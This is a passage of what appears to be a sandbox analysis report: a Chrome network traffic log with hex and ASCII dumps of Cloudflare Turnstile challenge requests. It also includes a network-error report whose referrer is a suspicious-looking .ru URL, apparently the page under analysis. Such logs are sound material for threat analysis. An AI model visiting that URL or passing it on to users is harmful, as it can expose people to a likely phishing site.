                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 70 76 49 6f 59 43 4b 6b 4c 47 70 70 4a 2b 65 73 36 57 53 70 64 53 71 6b 36 61 6f 7a 35 76 4b 75 4c 75 6a 76 38 4c 41 34 39 54 63 75 4e 6d 36 72 72 72 46 76 39 50 68 73 65 66 30 31 37 69 77 78 76 76 48 74 39 44 4c 39 2b 36 34 41 77 48 59 33 73 54 38 39 66 6a 47 35 38 76 64 78 39 44 63 44 2f 51 48 39 4f 76 75 37 41 62 32 39 52 62 64 45 39 30 4a 47 69 50 65 32 67 58 31 41 43 55 53 42 2f 54 6f 4b 41 58 74 47 65 63 54 41 43 59 73 4d 78 4d 74 42 6a 67 4e 39 41 30 4e 4d 69 2f 7a 45 77 35 44 4d 55 49 42 4f 68 38 49 51 7a 6f 41 4b 51 5a 52 44 31 45 4e 4c 53 4d 67 4e 54 4d 33 47 7a 73 34 46 6b 42 4f 4f 45 42 67 4c 47 45 6d 5a 47 46 55 59 45 63 2f 4f 7a 64 65 4d 46 74 74 55 54 4d 75 4c 45 51 78 5a 32 74 58 54 6b 6c 73 50 6c 46 52 55 54 75 44 67 31 70 59 51 30 69 46
                                                                              Data Ascii: pvIoYCKkLGppJ+es6WSpdSqk6aoz5vKuLujv8LA49TcuNm6rrrFv9Phsef017iwxvvHt9DL9+64AwHY3sT89fjG58vdx9DcD/QH9Ovu7Ab29RbdE90JGiPe2gX1ACUSB/ToKAXtGecTACYsMxMtBjgN9A0NMi/zEw5DMUIBOh8IQzoAKQZRD1ENLSMgNTM3Gzs4FkBOOEBgLGEmZGFUYEc/OzdeMFttUTMuLEQxZ2tXTklsPlFRUTuDg1pYQ0iF
                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 33 4e 75 37 4b 78 6c 74 69 31 7a 61 57 32 71 4c 37 47 7a 5a 65 58 79 39 2b 6a 6d 38 2f 6f 73 4c 47 2f 37 4e 79 6b 37 65 54 6c 36 73 48 42 33 65 7a 72 7a 62 48 47 35 37 6e 46 76 66 6a 51 7a 64 54 50 39 66 4b 33 31 74 45 48 39 41 62 45 2f 65 4c 4c 42 2f 33 44 37 4d 6b 56 30 67 33 51 38 4f 59 61 37 76 6f 52 45 76 59 4c 32 51 51 53 32 79 58 30 42 68 2f 2b 41 75 54 71 4b 77 62 6f 37 7a 44 36 2f 68 2f 77 4d 67 77 68 43 2f 63 37 50 44 4c 37 49 55 49 39 4d 69 50 32 4a 69 68 47 46 42 4e 46 48 68 63 6e 44 78 73 69 51 52 31 46 4d 55 46 41 52 6b 73 59 51 31 68 58 48 45 64 68 58 7a 59 33 5a 56 56 59 5a 6c 70 65 59 7a 34 36 56 6b 39 6b 52 69 6c 4b 4b 54 41 2b 52 45 52 4f 4f 46 70 32 53 6a 64 4f 50 54 78 2b 67 6c 77 36 54 30 4e 39 51 57 46 58 69 6c 39 72 67 59 4a 6e 65
                                                                              Data Ascii: 3Nu7Kxlti1zaW2qL7GzZeXy9+jm8/osLG/7Nyk7eTl6sHB3ezrzbHG57nFvfjQzdTP9fK31tEH9AbE/eLLB/3D7MkV0g3Q8OYa7voREvYL2QQS2yX0Bh/+AuTqKwbo7zD6/h/wMgwhC/c7PDL7IUI9MiP2JihGFBNFHhcnDxsiQR1FMUFARksYQ1hXHEdhXzY3ZVVYZlpeYz46Vk9kRilKKTA+REROOFp2SjdOPTx+glw6T0N9QWFXil9rgYJne
                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 6a 32 4e 44 53 70 74 7a 51 74 70 62 53 74 37 71 6a 72 75 50 47 6d 73 6e 4c 37 4c 62 48 33 4f 43 2b 79 71 54 6b 30 4e 58 32 31 73 79 30 39 63 2f 59 39 4c 76 2b 75 63 2b 37 35 41 59 42 39 65 61 36 78 4f 76 47 41 38 58 62 37 73 73 51 34 4e 50 39 38 68 66 66 36 41 6b 59 46 41 67 54 31 51 37 74 2f 42 45 42 38 2f 33 6c 45 50 6f 43 4a 51 33 33 34 2b 6b 77 44 4f 50 74 48 53 62 72 4b 51 51 5a 46 76 67 37 4c 66 51 6f 4b 6a 49 2f 4e 2f 6b 57 46 51 59 36 47 52 77 35 42 52 55 70 47 79 34 37 43 30 31 4e 55 46 42 46 4b 31 6c 46 4e 46 74 4b 54 79 77 7a 4b 6c 46 69 4f 6a 74 50 4a 6c 70 57 61 6b 4e 61 53 57 64 69 55 53 68 66 57 30 39 6c 4d 33 45 78 54 31 70 49 57 56 64 78 55 46 64 62 59 45 74 59 63 47 4a 2b 59 6d 52 42 66 6e 70 38 53 59 78 68 53 57 46 67 52 6d 6c 79 6b 57
                                                                              Data Ascii: j2NDSptzQtpbSt7qjruPGmsnL7LbH3OC+yqTk0NX21sy09c/Y9Lv+uc+75AYB9ea6xOvGA8Xb7ssQ4NP98hff6AkYFAgT1Q7t/BEB8/3lEPoCJQ334+kwDOPtHSbrKQQZFvg7LfQoKjI/N/kWFQY6GRw5BRUpGy47C01NUFBFK1lFNFtKTywzKlFiOjtPJlpWakNaSWdiUShfW09lM3ExT1pIWVdxUFdbYEtYcGJ+YmRBfnp8SYxhSWFgRmlykW


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.44978035.190.80.14438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:59 UTC484OUTPOST /report/v4?s=zZQRG60xCy9TgbQXucSIhcQcAohfQ9Pu%2BGzMBLuQAabo2K51xMlF8RFgASW9uj1KDW3jib2RN9D99FkMwEczc%2FoNzWjnztIXtWV61%2Bf%2FvW%2FPUuKekvyimmtui%2FSz%2FQ%3D%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 431
                                                                              Content-Type: application/reports+json
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:59 UTC431OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 67 65 36 6a 2e 73 69 73 62 6f 75 73 69 6d 2e 72 75 2f 6a 52 45 50 58 42 4d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72
                                                                              Data Ascii: [{"age":0,"body":{"elapsed_time":109,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://ge6j.sisbousim.ru/jREPXBM/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error
                                                                              2024-10-03 01:13:59 UTC168INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              date: Thu, 03 Oct 2024 01:13:59 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.449781104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:14:00 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1195242463:1727915362:58hzP5tn3icoVJf6EYrrU2uDT5trH6Au5dft6Khkcu4/8cc91295984a41f3/d43438995eb8455 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:14:00 UTC349INHTTP/1.1 404 Not Found
                                                                              Date: Thu, 03 Oct 2024 01:14:00 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 7
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              cf-chl-out: ACqdBSiHGNZNhpo/g5yQ9SfyU9hgwIzIZ38=$8Bk2+uJre0r+HVay
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc912a6bda74363-EWR
                                                                              2024-10-03 01:14:00 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                              Data Ascii: invalid


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.449782104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:14:00 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8cc91295984a41f3/1727918039189/1e1d3f1a7f4c611cab85d49738b3396bff4366852f88450f1e05fb6b95046ea4/SZnlSi60Er37Q1I HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=0
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:14:00 UTC143INHTTP/1.1 401 Unauthorized
                                                                              Date: Thu, 03 Oct 2024 01:14:00 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              2024-10-03 01:14:00 UTC1985INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 48 68 30 5f 47 6e 39 4d 59 52 79 72 68 64 53 58 4f 4c 4d 35 61 5f 39 44 5a 6f 55 76 69 45 55 50 48 67 58 37 61 35 55 45 62 71 51 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                              Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gHh0_Gn9MYRyrhdSXOLM5a_9DZoUviEUPHgX7a5UEbqQAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                              2024-10-03 01:14:00 UTC1INData Raw: 4a
                                                                              Data Ascii: J


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.449783104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:14:01 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8cc91295984a41f3/1727918039190/9M5zpoXvO6uqP1X HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:14:01 UTC170INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:14:01 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc912af2c72424c-EWR
                                                                              2024-10-03 01:14:01 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4a 00 00 00 35 08 02 00 00 00 69 c6 ea 32 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRJ5i2IDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.449784104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:14:01 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8cc91295984a41f3/1727918039190/9M5zpoXvO6uqP1X HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:14:02 UTC170INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:14:02 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc912b30da5c3fd-EWR
                                                                              2024-10-03 01:14:02 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4a 00 00 00 35 08 02 00 00 00 69 c6 ea 32 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRJ5i2IDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.449785104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:14:02 UTC927OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1195242463:1727915362:58hzP5tn3icoVJf6EYrrU2uDT5trH6Au5dft6Khkcu4/8cc91295984a41f3/d43438995eb8455 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 31389
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: d43438995eb8455
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:14:02 UTC16384OUTData Raw: 76 5f 38 63 63 39 31 32 39 35 39 38 34 61 34 31 66 33 3d 59 64 55 31 53 36 6d 2d 4b 66 4b 73 6a 41 4d 46 4c 46 35 66 55 73 30 6d 24 46 34 31 49 57 41 67 6e 46 37 67 46 36 75 57 6e 41 6a 6d 79 46 65 6e 69 64 58 57 46 63 49 35 31 54 57 69 2d 6d 76 46 66 6e 6d 67 52 46 79 64 6d 61 46 67 52 44 4a 46 69 78 49 46 77 6d 46 58 54 25 32 62 4d 31 36 6a 64 46 57 31 41 69 68 47 67 55 4b 46 72 34 46 77 6a 63 46 67 24 62 58 75 69 34 74 31 49 72 46 58 4f 55 73 58 46 78 39 39 31 46 73 69 46 73 63 55 35 66 55 46 65 31 57 46 77 42 79 30 65 4b 58 6d 4b 31 6d 35 36 41 63 32 6a 75 69 75 72 48 30 39 65 31 75 62 55 78 55 4f 67 57 73 4a 2d 41 46 35 4d 31 46 35 46 55 6a 49 4b 31 64 46 43 31 6d 45 44 4c 66 39 4a 48 62 70 6d 56 46 46 45 32 4d 78 4b 4f 50 50 73 4d 2b 70 4e 53 58 39
                                                                              Data Ascii: v_8cc91295984a41f3=YdU1S6m-KfKsjAMFLF5fUs0m$F41IWAgnF7gF6uWnAjmyFenidXWFcI51TWi-mvFfnmgRFydmaFgRDJFixIFwmFXT%2bM16jdFW1AihGgUKFr4FwjcFg$bXui4t1IrFXOUsXFx991FsiFscU5fUFe1WFwBy0eKXmK1m56Ac2juiurH09e1ubUxUOgWsJ-AF5M1F5FUjIK1dFC1mEDLf9JHbpmVFFE2MxKOPPsM+pNSX9
                                                                              2024-10-03 01:14:02 UTC15005OUTData Raw: 51 53 57 2d 59 71 69 49 39 31 6d 38 64 51 57 6d 6e 79 41 69 2b 73 71 79 69 49 4b 31 49 5a 64 71 6b 65 4b 6d 64 46 71 45 39 46 66 31 73 4b 46 52 57 6d 4d 55 43 46 65 46 73 72 6d 43 46 24 6e 67 64 46 6a 46 46 46 59 61 2b 46 61 46 69 53 61 2d 46 5a 46 69 6a 46 31 46 6a 31 59 44 6d 2b 46 72 31 46 4b 36 52 46 55 46 58 4b 36 63 46 35 31 69 46 73 52 46 79 31 35 6a 36 48 46 4d 46 73 6a 46 5a 63 6e 31 59 55 73 58 46 61 49 66 46 73 54 46 47 46 6d 2d 46 75 46 52 46 73 53 46 6c 39 6d 49 36 5a 70 67 6d 52 46 73 31 46 70 46 4d 46 79 64 36 6b 31 46 31 65 6e 49 31 46 4e 46 75 51 75 32 46 4d 69 37 46 36 32 57 63 49 74 37 70 4b 57 2d 31 6c 55 41 62 6d 78 46 73 4f 6d 4d 46 46 31 79 55 4e 4b 46 50 62 6d 6b 39 77 57 77 46 4d 24 61 70 64 63 69 59 77 70 61 4b 71 74 53 24 61 2b
                                                                              Data Ascii: QSW-YqiI91m8dQWmnyAi+sqyiIK1IZdqkeKmdFqE9Ff1sKFRWmMUCFeFsrmCF$ngdFjFFFYa+FaFiSa-FZFijF1Fj1YDm+Fr1FK6RFUFXK6cF51iFsRFy15j6HFMFsjFZcn1YUsXFaIfFsTFGFm-FuFRFsSFl9mI6ZpgmRFs1FpFMFyd6k1F1enI1FNFuQu2FMi7F62WcIt7pKW-1lUAbmxFsOmMFF1yUNKFPbmk9wWwFM$apdciYwpaKqtS$a+
                                                                              2024-10-03 01:14:02 UTC300INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:14:02 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 26824
                                                                              Connection: close
                                                                              cf-chl-gen: kZXCgg+4Y+mIedW4zDP9OkeplXQLOHX67nhOV2n2OtLCUh15k21Q8hgusWo51HHhyhXrNga8Cn326Y89$ENUXwHAUgQYkxMFg
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc912b4ae02422f-EWR
                                                                              2024-10-03 01:14:02 UTC1069INData Raw: 70 71 65 32 63 35 53 32 6f 61 36 6c 75 37 65 30 70 37 62 47 6e 62 6e 45 69 4a 36 63 71 35 43 69 6f 4c 43 77 75 62 4f 30 75 4d 65 75 73 4c 54 56 31 64 75 33 78 71 36 2b 34 65 71 71 35 36 54 75 35 63 6a 51 33 39 7a 43 30 65 7a 6a 73 65 50 32 35 66 48 48 2f 76 50 49 34 50 50 71 2b 4f 45 45 39 4c 33 65 38 74 66 37 34 63 66 6f 41 77 44 79 36 42 48 71 2f 65 4d 49 37 51 73 49 44 78 77 63 39 52 33 32 45 4f 38 55 2b 52 67 47 39 53 51 69 42 41 4d 44 47 2f 73 67 41 2f 30 52 36 7a 41 33 47 41 50 79 4f 79 34 46 48 53 6f 72 48 76 49 4b 49 78 4d 61 41 44 41 43 4a 67 41 35 47 41 55 36 4f 41 6f 62 4c 67 30 4c 42 30 63 32 4a 6a 59 54 4c 43 30 70 56 68 38 62 4c 54 41 68 57 78 35 63 58 6b 6c 68 55 32 4d 2f 4e 32 42 6c 4b 32 4e 6a 54 79 39 31 56 48 5a 30 55 6c 4d 74 5a 30 56
                                                                              Data Ascii: pqe2c5S2oa6lu7e0p7bGnbnEiJ6cq5CioLCwubO0uMeusLTV1du3xq6+4eqq56Tu5cjQ39zC0ezjseP25fHH/vPI4PPq+OEE9L3e8tf74cfoAwDy6BHq/eMI7QsIDxwc9R32EO8U+RgG9SQiBAMDG/sgA/0R6zA3GAPyOy4FHSorHvIKIxMaADACJgA5GAU6OAobLg0LB0c2JjYTLC0pVh8bLTAhWx5cXklhU2M/N2BlK2NjTy91VHZ0UlMtZ0V
                                                                              2024-10-03 01:14:02 UTC1369INData Raw: 74 57 34 6e 70 6a 65 6f 64 66 5a 34 63 4f 33 37 65 48 4e 76 75 65 72 38 36 32 30 36 72 62 36 77 75 6e 4b 37 38 6a 31 32 38 32 2b 36 2f 72 43 77 66 66 57 41 75 66 49 35 39 66 4b 39 77 50 49 44 67 6e 78 7a 51 37 52 47 76 48 6c 47 77 62 62 32 41 48 57 37 2f 7a 72 44 66 45 6d 43 50 33 31 4b 65 59 65 49 43 30 6f 44 79 67 77 4c 54 4c 79 37 43 33 77 2b 54 4c 31 50 42 74 41 4d 79 72 2b 4f 43 77 50 47 78 38 2b 49 78 56 4a 50 6a 73 37 4c 6a 30 5a 54 6a 35 52 52 30 46 4d 4e 43 34 6c 57 79 51 56 4c 54 68 41 49 44 42 53 51 45 38 78 5a 6c 35 58 4f 6d 78 4d 51 44 74 74 4c 31 4a 6b 63 57 78 54 62 48 52 78 64 6a 63 78 63 54 55 2b 64 6a 6f 38 58 34 52 32 50 6c 4a 42 58 46 6c 68 57 6c 70 31 67 6e 31 37 65 6f 70 72 67 6d 4a 56 6b 35 42 6c 6d 70 75 48 5a 35 32 59 65 33 6c 5a
                                                                              Data Ascii: tW4npjeodfZ4cO37eHNvuer86206rb6wunK78j1282+6/rCwffWAufI59fK9wPIDgnxzQ7RGvHlGwbb2AHW7/zrDfEmCP31KeYeIC0oDygwLTLy7C3w+TL1PBtAMyr+OCwPGx8+IxVJPjs7Lj0ZTj5RR0FMNC4lWyQVLThAIDBSQE8xZl5XOmxMQDttL1JkcWxTbHRxdjcxcTU+djo8X4R2PlJBXFlhWlp1gn17eoprgmJVk5BlmpuHZ52Ye3lZ
                                                                              2024-10-03 01:14:02 UTC1369INData Raw: 72 72 37 4f 33 75 33 2f 44 78 38 73 33 6b 38 4d 72 65 35 66 4f 33 37 75 6d 7a 37 64 7a 74 41 76 7a 67 38 62 2f 45 39 74 4d 46 32 50 72 62 2b 2b 72 35 33 2b 66 6b 36 51 38 56 31 51 58 74 45 52 4c 56 45 4e 54 57 44 4e 63 64 32 65 48 77 2b 41 66 75 45 67 41 43 42 42 6f 49 35 65 7a 71 2b 2b 67 6d 46 53 67 46 4e 69 34 5a 47 53 66 33 42 52 59 63 50 54 6b 74 4f 44 59 74 45 55 59 44 4a 68 59 6a 43 77 55 59 50 69 41 6f 48 43 30 63 43 79 78 49 53 44 51 6b 50 45 52 4f 58 6c 6c 64 57 42 70 4d 57 46 41 6b 4e 46 49 6d 50 31 6c 6a 5a 57 39 67 62 32 78 4d 53 30 51 72 52 55 74 30 65 55 39 74 55 56 70 61 63 6a 31 4e 55 56 34 38 67 54 35 47 56 56 31 72 55 33 5a 6b 5a 6d 68 2b 62 45 69 4b 54 32 42 50 5a 48 6d 4b 62 33 5a 73 54 32 39 75 57 49 78 67 63 49 39 30 68 46 31 39 59
                                                                              Data Ascii: rr7O3u3/Dx8s3k8Mre5fO37umz7dztAvzg8b/E9tMF2Prb++r53+fk6Q8V1QXtERLVENTWDNcd2eHw+AfuEgACBBoI5ezq++gmFSgFNi4ZGSf3BRYcPTktODYtEUYDJhYjCwUYPiAoHC0cCyxISDQkPEROXlldWBpMWFAkNFImP1ljZW9gb2xMS0QrRUt0eU9tUVpacj1NUV48gT5GVV1rU3ZkZmh+bEiKT2BPZHmKb3ZsT29uWIxgcI90hF19Y
                                                                              2024-10-03 01:14:02 UTC1369INData Raw: 66 30 76 4b 37 35 4e 2b 76 36 38 65 32 79 62 50 54 35 62 76 76 38 51 48 30 41 67 62 53 38 77 6b 4b 77 64 55 4e 44 73 51 41 45 52 4c 49 38 65 45 46 39 65 55 59 45 75 30 48 48 64 55 62 2f 4e 30 41 49 42 51 42 39 2b 58 6a 46 65 59 57 41 67 7a 30 4c 43 67 73 4d 69 51 55 2f 76 34 79 43 51 45 4d 4f 6a 55 76 4f 54 55 50 47 7a 41 56 41 68 49 6c 4f 42 49 54 47 7a 38 66 4f 6b 56 4a 42 55 46 50 4a 6a 34 30 52 6a 51 6e 57 44 63 55 52 31 73 38 4e 78 30 39 4e 79 49 67 4d 79 4e 52 5a 45 67 30 59 47 45 6c 50 32 4e 72 4f 55 52 79 62 6a 31 7a 62 55 64 54 61 47 5a 53 61 7a 6f 39 55 6c 68 62 4f 49 46 54 5a 54 31 52 67 33 6c 69 53 31 32 46 69 32 35 36 69 55 70 2b 67 47 61 42 64 49 4a 73 57 6e 69 47 63 32 39 72 6f 48 4f 59 67 59 36 51 62 34 69 56 67 57 47 63 67 4b 53 64 59 5a
                                                                              Data Ascii: f0vK75N+v68e2ybPT5bvv8QH0AgbS8wkKwdUNDsQAERLI8eEF9eUYEu0HHdUb/N0AIBQB9+XjFeYWAgz0LCgsMiQU/v4yCQEMOjUvOTUPGzAVAhIlOBITGz8fOkVJBUFPJj40RjQnWDcUR1s8Nx09NyIgMyNRZEg0YGElP2NrOURybj1zbUdTaGZSazo9UlhbOIFTZT1Rg3liS12Fi256iUp+gGaBdIJsWniGc29roHOYgY6Qb4iVgWGcgKSdYZ
